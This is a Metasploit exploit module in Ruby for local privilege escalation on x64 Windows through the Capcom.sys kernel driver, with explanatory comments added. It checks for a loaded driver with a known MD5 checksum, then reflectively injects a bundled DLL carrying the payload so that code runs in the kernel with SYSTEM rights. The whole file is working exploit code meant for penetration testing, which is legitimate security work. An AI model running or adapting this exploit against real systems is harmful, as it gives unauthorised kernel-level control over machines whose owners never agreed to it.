Path: blob/master/modules/exploits/windows/local/capcom_sys_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation via the Capcom.sys kernel driver.
#
# The module does not load the driver itself: +check+ only enumerates the
# drivers already loaded on the target (stdapi_sys_config_driver_list) and
# compares the on-disk MD5 (stdapi_fs_md5) of a driver named capcom.sys with
# one known checksum. Only an exact match yields CheckCode::Appears; every
# other outcome is Safe or Unknown and +exploit+ refuses to run on them.
#
# Windows 11 builds after 22000.194 ship a driver block list that prevents
# this driver from loading (see the Description), so the version gate in
# +check+ short-circuits to Safe on those builds.
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  # AutoCheck is prepended, so +check+ is normally run by the framework before
  # +exploit+; +exploit+ calls it again explicitly (see below).
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata. x64 Meterpreter sessions only; the payload is capped at
  # 4096 bytes and NOPs are disabled because it is handed to the injected DLL
  # rather than placed in a generic buffer.
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Windows Capcom.sys Kernel Execution Exploit (x64 only)',
          'Description' => %q{
            This module abuses the Capcom.sys kernel driver's function that allows for an
            arbitrary function to be executed in the kernel from user land. This function
            purposely disables SMEP prior to invoking a function given by the caller.
            This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.
            Note that builds after 22000.194 contain deny lists that prevent this driver from loading.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'TheWack0lian', # Issue discovery
            'OJ Reeves' # exploit and msf module
          ],
          'Arch' => [ARCH_X64],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread'
          },
          'Targets' => [
            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
          ],
          'Payload' => {
            'Space' => 4096,
            'DisableNops' => true
          },
          'References' => [
            ['URL', 'https://twitter.com/TheWack0lian/status/779397840762245124']
          ],
          'DisclosureDate' => '1999-01-01', # non-vuln exploit date
          'DefaultTarget' => 0,
          # Meterpreter commands +check+ depends on: driver enumeration and
          # remote file hashing. The framework uses this list to refuse to run
          # against sessions that lack them.
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_fs_md5
                stdapi_sys_config_driver_list
              ]
            }
          },
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )
  end

  # Determines whether the target looks exploitable.
  #
  # Returns:
  #   Unknown  - session is not Windows, the build predates Windows 7 SP0, or
  #              the host is a server edition (none of which were tested).
  #   Safe     - build is newer than 10.0.22000.194 (driver block list), the
  #              host is not x64, or no loaded driver named capcom.sys hashes
  #              to the expected MD5.
  #   Appears  - a loaded capcom.sys matches the expected checksum.
  def check
    return Exploit::CheckCode::Unknown unless session.platform == 'windows'

    version = get_version_info
    # Pre-Win7 and server SKUs are untested rather than known-safe, hence Unknown.
    if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?
      return Exploit::CheckCode::Unknown
    end

    # These versions of Windows 11 come built in with a driver block list preventing loading of capcom.sys
    # NOTE(review): build_number is compared directly against a Rex::Version,
    # so it is presumably a Rex::Version (or comparable) itself - confirm.
    if version.build_number > Rex::Version.new('10.0.22000.194')
      return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')
    end

    if sysinfo['Architecture'] != ARCH_X64
      return Exploit::CheckCode::Safe
    end

    # Validate that the driver has been loaded and that
    # the version is the same as the one expected
    # Only the driver basename is matched (case-insensitively); the MD5 of
    # the file on disk then ties the check to one specific driver build.
    client.sys.config.getdrivers.each do |d|
      next unless d[:basename].downcase == 'capcom.sys'

      expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'
      target_checksum = client.fs.file.md5(d[:filename])

      # md5 appears to return raw digest bytes; to_hex with an empty separator
      # turns them into the lowercase hex string compared here.
      if expected_checksum == Rex::Text.to_hex(target_checksum, '')
        return Exploit::CheckCode::Appears
      end
    end

    # No loaded capcom.sys with the expected checksum.
    return Exploit::CheckCode::Safe
  end

  # Runs the exploit: re-validates the target, then injects the bundled x64
  # DLL with the encoded payload via ReflectiveDLLInjection#execute_dll.
  #
  # Each fail_with call aborts the module with the given Failure reason; the
  # code after it does not run.
  def exploit
    # Nothing to escalate if the session already has SYSTEM privileges.
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    # check is called again here in addition to the AutoCheck run, so a Safe or
    # Unknown result always blocks execution - presumably even when the
    # framework's automatic check has been overridden (ForceExploit); confirm.
    check_result = check
    if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end

    # Session and target architecture must both be native x64: a 32-bit
    # (WOW64) session or an x86 target selection cannot be used with the
    # x64 DLL below. (check has already required an x64 host at this point.)
    if sysinfo['Architecture'] == ARCH_X64
      if session.arch == ARCH_X86
        fail_with(Failure::NoTarget, 'Running against WOW64 is not supported, please get an x64 session')
      end

      if target.arch.first == ARCH_X86
        fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
      end
    end

    # The DLL is shipped in the framework's data directory; the encoded payload
    # is handed to it as the second argument of execute_dll.
    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'capcom_sys_exec', 'capcom_sys_exec.x64.dll'),
      encoded_payload
    )

    # execute_dll does not report success of the kernel-side step, hence the
    # hedged message.
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end